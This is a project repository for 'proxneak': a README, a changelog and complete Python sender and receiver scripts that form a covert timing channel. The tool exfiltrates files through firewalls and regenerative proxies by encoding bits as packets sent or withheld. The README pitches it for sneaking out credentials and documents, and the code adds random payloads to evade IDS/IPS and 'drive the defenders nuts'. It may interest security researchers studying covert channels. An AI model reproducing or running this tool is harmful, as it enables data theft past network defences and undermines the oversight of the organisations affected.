README.md
proxneak
========

A means of exfiltrating data through anything that allows a connection,
including regenerative proxies.

The idea came to me while I was tinkering with an application-proxy firewall.
For those unfamiliar, these devices use a deeper level of packet inspection to
determine the protocol in use and match it to a rule.  For example, if generic
HTTP is allowed, then someone trying to tunnel, say, SSH over it would find
the connection dropped.  While there are some clever ways out there of hiding
one protocol in another (HTTP over DNS comes to mind), I wanted a way to send
information regardless of the filters.

Proxneak does this by utilizing the basic behavior of the proxies (if there is
one) to send the packet on if it matches the parameters.  Many proxies will
establish a TCP connection first to see if it's allowed and then look at the
contents to see if it should be closed off.  In part to prevent something
sneaking through in the structure, they regenerate the packet entirely, often
resulting in a TCP connection from an OS different from the originating system
(for example, FreeBSD instead of Windows).  But it still sends a packet, and
that a packet is sent can still be a form of information.

The code uses timing between received packets to signify bits: a packet 
arriving means a 1, no packet means a 0.  There's an opening set of eight 
packets to set the timing and a closing sequence that equates to 0x00FFFF 
to initiate decoding.

Data is sent Base64-encoded and, optionally, compressed.  It's slow: at a 
default rate of one packet per second with no compression, it takes an entire 
day to send about 8KB.  But that's more than enough to sneak out some 
credentials, and if you have a reasonably good connection and a couple of days, 
it's possible to sneak out a Word doc or PDF.

(Note that this might also be a way of sending information, albeit slowly,
that the NSA, et al., can't reasonably track.  Saving all of the SYN packets
that cross the Internet just isn't a practical way of doing business.)

Requirements
============
 - Python 2.7 on sending and receiving side (basic installation may suffice,
   python-argparse sometimes needs to be added)
 - pcapy on the receiving side


Install
=======
Download the latest version from the GitHub repo:

git clone https://github.com/NetworkLlama/proxneak.git


Usage
=====
Set up the server:

```sudo python proxneak-server.py -i eth0 --proto t -p 80 -f test.txt```


And then send the data with the client:

```python proxneak.py -d 198.51.100.27 --proto t -p 80 -f test.txt -r 10```


Command Line
============
Sender
------
* -h, --help   show this help message and exit
* -s <src>     Source IP address (not currently implemented
* -d <dst>     Destination IP address (required)
* -p port      Destination port (default is 53)
* --proto      Protocol to use (t=TCP, u=UDP (default), i=ICMP); ICMP requires
               root access
* -f filename  Input file name
* -r integer   Number of packets to send per second (default 1; recommended is
               5 or less)
* -v           Verbose mode (be aware that this may leave behind artifacts)
* -V           Display version number
* -z           Compress content with bzip2 before sending

Receiver
--------
* -h, --help          show this help message and exit
* -i <interface>      Listener network interface (required)
* -s <src>            Sending IP address (optional)
* -d <dst>            Receiving IP address (optional)
* -p <port>           Listener port (default is 53)
* --proto <protocol>  Protocol to use (T=TCP, U=UDP (default), I=ICMP)
* -f filename         Output file name (required)
* -r filename         Read a list file in (requires --proto be specified)
* -v                  Verbose mode
* -V                  Display version number
* -z                  Incoming content is compressed with bzip2


Usage Notes
===========
* Sending to a system set to drop the inbound packets seems to work best (at
  least with regard to UDP).
* If you send with -z, you must receive with -z.  There's no automatic checking
  yet for whether incoming material is compressed.
* The rate setting (-r) is the number of packets per second, so it's the
  inverse of the gap between packets (-r 10 is 10pps or ~100ms between
  packets).  Be realistic.  Sending at 100pps might work if you're on a network
  that can actually do full gigabit, it's not going to work.  There's a reason
  the default is 1pps, and even that can have problems.
* Wireless makes life difficult.  The odds of a packet being delayed and
  throwing off the entire thing is extremely high, such that anything past a
  couple of hundred bytes has a very strong tendency to fail unless your gap is
  greater than about eight seconds.


Thanks
======
* Stephen Sims for getting me started on Python in a grueling SANS SEC660 class
* Lelouch Lamperouge for some inspiration on bits-to-bytes conversion
* Silver Moon for his pcapy code
* Catherine for putting up with me while I'm coding


Contact
=======
Jarrod Frates (jfrates@gmail.com)
http://llamasinmynetwork.com


changelog
Version 0.3
===========
Changed
-------
* Fixed some comments so they reflected the code
* Made packet data (at least for UDP) random to limit IDS/IPS filtering
* Improved debug code
* Moved client main code into main() function
* Synchronized switch labels
* Flexibility on decoding to allow for greater trip time variance

Added
-----
* Functional compression using bzip2
* Initial TCP functionality


Version 0.2
===========
Changed
-------
* Moved from scapy to pcapy to address some timing issues and slightly ease requirements
* Made -f (file output) switch mandatory on receiver

Added
-----
* -r switch to read debug files on receiver
* -v switch to enable verbosity (debug code)
* Initial multiple protocol support (not tested much)
* Interface support for listener (now mandatory)

Removed
-------
* -u unicode option (not implemented or necessary)
* Some debug code


Version 0.1 (Never posted publicly)
===========
Added
-----
* Base64 encoding to handle binary input
* A lot of debug code, including debug file output for sender and receiver


Version 0.0
===========
Initial upload


proxneak.py
# File: proxneak.py
# Copyright (c) 2012 by Jarrod Frates
#
# GNU General Public Licence (GPL)
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59 Temple
# Place, Suite 330, Boston, MA  02111-1307  USA
#

import argparse
import base64
import bz2
import random
import socket
import string
import sys
import time

parser = argparse.ArgumentParser(description='Sneak data out through any ' +
    'connection that allows traffic to pass through, even if it\'s a '
    'regenerative proxy. Be aware that random latency can cause problems ' +
    'reconstructing the data at the receiving end; latency effects increase ' +
    'as packet rate is increased.')
parser.add_argument('-s', nargs=1, metavar='<src>',
    help='Source IP address (not currently implemented')
parser.add_argument('-d', nargs=1, metavar='<dst>',
    help='Destination IP address (required)')
parser.add_argument('-p', nargs=1, metavar='port',
    help='Destination port (default is 53)')
parser.add_argument('--proto', nargs=1, metavar='',
    help='Protocol to use (t=TCP, u=UDP (default), i=ICMP); ICMP requires ' +
    'root access')
parser.add_argument('-f', nargs=1, metavar='filename', help='Input file name')
parser.add_argument('-r', nargs=1, metavar='integer',
    help='Number of packets to send per second ' +
    '(default 1; recommended is 5 or less)')
parser.add_argument('-v', action='store_true', help='Verbose mode (be aware ' +
    'that this may leave behind artifacts)')
parser.add_argument('-V', action='version', version='0.3',
    help='Display version number')
parser.add_argument('-z', action='store_true',
    help='Compress content using bzip2 before sending')

args = parser.parse_args()

# Set some default parameters if they're not already set by argument.
# Defaults are port 53, 1 packet/sec, use UDP
if args.d:
    dest = args.d[0]
else:
    print "Destination address (-d) is required."
    sys.exit()
if not args.p:
    dstport = 53
else:
    dstport = int(args.p[0])
if args.f:
    fin = args.f[0]
if not args.r:
    pps = 1
else:
    pps = int(args.r[0])

if not args.proto:
    proto = 'TCP'
else:
    if args.proto[0] == 't':
        proto = 'TCP'
    elif args.proto[0] == 'u':
        proto = 'UDP'
    elif args.proto[0] == 'i':
        proto = 'ICMP'
    else:
        proto = 'UDP'

debug_count = 0

data = ''


# Set default packet data.  This is a random string that is then encoded with
# base64.  The intention is to drive the defenders nuts trying to decode and
# then decrypt what looks like encrypted data, thus further distracting them
# from the true goal of the program.
# TODO: Make this look more realistic for some protocols
# TODO: ICMP to look like Windows, Linux, or Plan9
# TODO: TCP to look like Windows or Linux
def p_data():
    global data
    data_len = random.randrange(16, 120)
    data.join(random.choice(string.ascii_uppercase + string.digits)
        for x in range(data_len))
    data = base64.b64encode(data)
    return data


# binstring takes a single character and converts it to an 8-character string
#   of zeroes and ones
def binstring(c):
    if (len(c) > 1) or (type(c) is not str):
        return None
    str1 = str(bin(ord(c)))[2:]
    if len(str1) < 8:
        str1 = '0' * (8 - len(str1)) + str1
    return str1


# sendchar takes a single character, uses binstring to convert it to "binary",
# and then parses the "binary" string to determine whether to send a packet
# after each timing gap
def sendchar(c, delay):
    global debug_count
    if args.v:
        print '===============> ' + c + ' <==============='
    str1 = binstring(c)
    if str1 is None:
        return
    for l in str1:
        if l == '0':
            if args.v:
                debug_count += 1
            # print str(debug_count) + " No packet to send"
            time.sleep(delay)
        else:
            if args.v:
                debug_count += 1
            buildandsend(delay)


# sendmessage parses the text to send, running each character through sendchar
# to send out the packet sequence representing the binary of the text.
def sendmessage(text, rate):
    if type(text) is not str:
        return "proxneak requires a string to send"
    if rate <= 0:
        return "proxneak requires a positive rate"
    for l in text:
        sendchar(l, 1. / rate)


# Check the protocol and send packets of the appropriate type
# TODO: Make packets look like something real as these will stand out to an
# experienced packeteer
# PONDER: Better to have timer here or in sendchar?
def buildandsend(delay):
    global debug_count
    if args.v:
        print str(debug_count) + " Sending packet"
    if (proto == 'TCP'):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        try:
            s.connect((dest, dstport))
            s.close
        except:
            pass
        time.sleep(delay)
    if (proto == 'UDP'):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
        s.connect((dest, dstport))
        s.send(p_data())
        s.close
        time.sleep(delay)
    if (proto == 'ICMP'):
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, 1)
        s.connect((dest, dstport))
        s.send(data)
        s.close
        time.sleep(delay)
    return


# Retrieve the data to send and put it in base64 format.  This removes the
# possibility of NULL and 0xFF characters (terminating string) being sent.
# TODO: Compress before conversion if required
def main():
    content = open(fin, mode='r')
    if args.z:
        message = base64.b64encode(bz2.compress(content.read()))
    else:
        message = base64.b64encode(content.read())

    # Debug code to compare input and output
    if args.v:
        tMessageFile = open('tempmessage-b64', 'wb')
        tMessageFile.write(message)
        tMessageFile.close

    # Synchronize the connection by sending eight packets
    print "Synchronizing..."
    sendmessage(chr(255), pps)

    # Send the message as one bit per transmission
    print "Sending data..."
    sendmessage(message, pps)

    # Close out the connection with ending sequence of 0x00FF
    print "Finishing up."
    sendmessage(chr(0) + chr(255) + chr(255), pps)


if __name__ == '__main__':
    main()


proxneak-server.py
# File: proxneak-server.py
# Copyright (c) 2012 by Jarrod Frates
#
# GNU General Public Licence (GPL)
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59 Temple
# Place, Suite 330, Boston, MA  02111-1307  USA
#

import argparse
import base64
import bz2
import pickle
import pcapy
import socket
from struct import *
import sys
import time

parser = argparse.ArgumentParser(description='Receive data from any ' +
    'connection that allows traffic to pass through, even if there\'s a ' +
    'regenerative proxy in the stream. Be aware that random latency can ' +
    'cause problems at the receiving end.  Requires root privileges.')
parser.add_argument('-i', nargs=1, metavar='<interface>',
    help='Listener network interface (required)')
parser.add_argument('-s', nargs=1, metavar='<src>',
    help='Sending IP address (optional)')
parser.add_argument('-d', nargs=1, metavar='<dst>',
    help='Receiving IP address (optional)')
parser.add_argument('-p', nargs=1, metavar='<port>',
    help='Listener port (default is 53)')
parser.add_argument('--proto', nargs=1, metavar='<protocol>',
    help='Protocol to use (T=TCP, U=UDP (default), I=ICMP)')
parser.add_argument('-f', nargs=1, metavar='filename',
    help='Output file name (required)')
parser.add_argument('-r', nargs=1, metavar='filename', help='Read a list ' +
    'file in (requires --proto be specified)')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-V', action='version', version='0.3',
    help='Display version number')
parser.add_argument('-z', action='store_true',
    help='Incoming content is compressed with bzip2')

args = parser.parse_args()

# Set some default parameters if they're not already set by argument.
# Defaults are port 80, 1 packet/sec, use UDP
if not args.i:
    print 'Requires an interface be specified with -i.  Exiting.'
    sys.exit()
else:
    i_face = args.i[0]

if not args.p:
    dstport = 53
else:
    dstport = int(args.p[0])

if not args.f:
    print 'Requires an output file be specified with -f.  Exiting.'
    sys.exit()
else:
    f_out = args.f[0]

if not args.proto:
    proto = '\\udp'
else:
    if args.proto[0] == 't':
        proto = '\\tcp'
    elif args.proto[0] == 'u':
        proto = '\\udp'
    elif args.proto[0] == 'i':
        proto = '\\icmp'
    else:
        proto = '\\udp'

if args.r:
    if not args.f:
        print 'Requires a protocol be specified with --proto. Exiting.'
        sys.exit()
    else:
        f_in = args.r[0]
else:
    f_in = None


# Create a list to store useful information about the packets received
# Contents will vary based on protocol involved, but will always include time
packets = []
gap = 0
message = ''
filt = 'ip proto ' + proto + ' && port ' + str(dstport)
if args.s:
    filt = filt + ' && ' + args.s
if args.d:
    filt = filt + ' && ' + args.d
if proto == '\\tcp':
    filt = filt + ' && tcp[13] = 0x02'
print filt


def listener():
    # Setup listener using pcapy
    # Listen on i_face, large snaplen, not promiscuous, no timeout
    cap = pcapy.open_live(i_face, 65536, 1, 0)
    cap.setfilter(filt)

    # Start capturing packets to process
    while (1):
        (header, packet) = cap.next()
        packetstore(packet)


# Add packets to the packet store.  Working only for UDP right now.
def packetstore(p):
    global packets
    p_info = parse_packet(p)
    if args.v:
        print p_info[0]
    # TODO: If TCP, check if sequence number is already present and don't
    #       append it if it is.  This will protect against proxies that
    #       continue to try to connect even if the originating system is no
    #       longer trying to send.
    packets.append(p_info)
    if len(packets) == 8:
        synchronize()
    if len(packets) >= 24:
        check_finish()


# Much of the following code copied from Silver Moon
# www.binarytides.com/code-a-packet-sniffer-in-python-with-pcapy-extension/
def parse_packet(packet):
    # Parse the Ethernet header, unpack, and extract the Ethernet proto number.
    eth_len = 14

    eth_header = packet[:eth_len]
    eth = unpack('!6s6sH', eth_header)
    eth_proto = socket.ntohs(eth[2])

    # Parse IP packets (IP Proto number is 8)
    if eth_proto == 8:
        # Parse IP header
        # Take first 20 characters for the IP header
        ip_header = packet[eth_len:20 + eth_len]
        iph = unpack('!BBHHHBBH4s4s', ip_header)

        # Put them into a usable structure
        version_ihl = iph[0]
        version = version_ihl >> 4
        ihl = version_ihl & 0xF

        iph_len = ihl * 4

        # Start extracting useful information
        ttl = iph[5]
        protocol = iph[6]
        s_addr = socket.inet_ntoa(iph[8])
        d_addr = socket.inet_ntoa(iph[9])

        # TCP Protocol
        if protocol == 6:
            t = iph_len + eth_len
            tcp_header = packet[t:t + 20]

            tcph = unpack('!HHLLBBHHH', tcp_header)

            s_port = tcph[0]
            d_port = tcph[1]
            sequence = tcph[2]

            return [time.time(), s_addr, s_port, sequence]

        # UDP Protocol
        elif protocol == 17:
            u = iph_len + eth_len
            udph_len = 8
            udp_header = packet[u:u + 8]

            udph = unpack('!HHHH', udp_header)

            s_port = udph[0]
            d_port = udph[1]

            info = [time.time(), s_addr, s_port]
            return info

        # ICMP Protocol
        elif protocol == 1:
            i = iph_len + eth_len
            icmph_len = 4
            icmp_header = packet[i:i + 4]

            icmph = unpack('!BBH', icmp_header)

            icmp_type = icmph[0]
            icmp_code = icmph[1]

            return [time.time(), s_addr, icmp_type, icmp_code]

        # If not TCP/UDP/ICMP
        else:
            print 'Protocol not TCP/UDP/ICMP. Exiting.'
            sys.exit()


# Use the initial 8 packets to determine average packet spacing.  Failure to
# receive any of these will throw off the entire reception.
def synchronize():
    global gap
    gap = (packets[7][0] - packets[0][0]) / 7
    if args.v:
        print "Average gap: " + str(gap) + " seconds"


# Look at the last 8 packets received and see if they came in within
# approximately the same spacing as the first sequence.  The closing sequence
# is 0x00FF, represented by 8 no-packets and 8 packets.  This is a unique
# sequence given that the message itself is base64-encoded.
def check_finish():
    global packets
    global gap
    q = len(packets) - 1
    gap_check = (packets[q][0] - packets[q - 15][0]) / 15
    # Allow a small fudge factor in the check for random latency
    if gap_check <= gap * 1.10:
        print "Decoding..."
        p_decode(packets)
        reset()


# Turn the packet store into a usable message file
def p_decode(m):
    global message
    global f_out

    # Start with the 8th and 9th packets to determine bit spacing between them.
    # If it's greater than gap, divide and round to determine by how much and
    # add enough zeroes to buffer.
    a = 7
    b = 8
    tempStr = ''
    print 'Packets received: ' + str(len(m))
    while b < (len(m) - 7):
        t = m[b][0] - m[a][0]
        u = round(t / gap)
        # Verbose code
        if args.v:
            print 'Current pair: %.6f and %.6f and Gap = %.2f' % \
            (m[b][0], m[a][0], u)
        tempStr = tempStr + ('0' * (int(u) - 1)) + '1'
        # The following decoder was inspired by code from Lelouch Lamperouge
        # http://stackoverflow.com/questions/7732496/
        if len(tempStr) >= 8:
            x = int(tempStr[0:8], 2)
            message = message + chr(x)
            # Debug code to see what's actually coming in'
            if args.v:
                print 'Character: ' + str(x)
            if len(tempStr) == 8:
                tempStr = ''
            else:
                tempStr = tempStr[8:]
                if tempStr[0] == 1:
                    tempStr = '0' + tempStr
        a += 1
        b += 1
    # Create a file called something like proxneak-1372837358 if no filename
    # has been provided.
    # At the moment, I don't have a way to guess the proper extension
    # TODO: Add some sanity checking to make sure the Base64 message ends in a
    #       valid format.
    if not f_out:
        f_out = 'proxneak-' + str(int(time.mktime(time.gmtime())))
    tempFile = open(f_out, 'wb')
    if args.z:
        tempFile.write(bz2.decompress(base64.b64decode(message)))
    else:
        tempFile.write(base64.b64decode(message))
    tempFile.close()
    print "Message written out to " + f_out

    # Save Base64 to compare input and output or partial recovery in case
    # of corrupted transmission
    tMessageFile = open(f_out + '-message', 'wb')
    tMessageFile.write(message)
    tMessageFile.close

    # Debug code for possible later use
    if args.v:
        tDebugFile = open(f_out + '-debug', 'wb')
        pickle.dump(m, tDebugFile)
        tDebugFile.close

    sys.exit()


def main():
    global packets
    global f_in
    if f_in:
        f = open(f_in, 'r+')
        packets = pickle.load(f)
        f.close
        synchronize()
        p_decode(packets)
    else:
        listener()


if __name__ == '__main__':
    main()
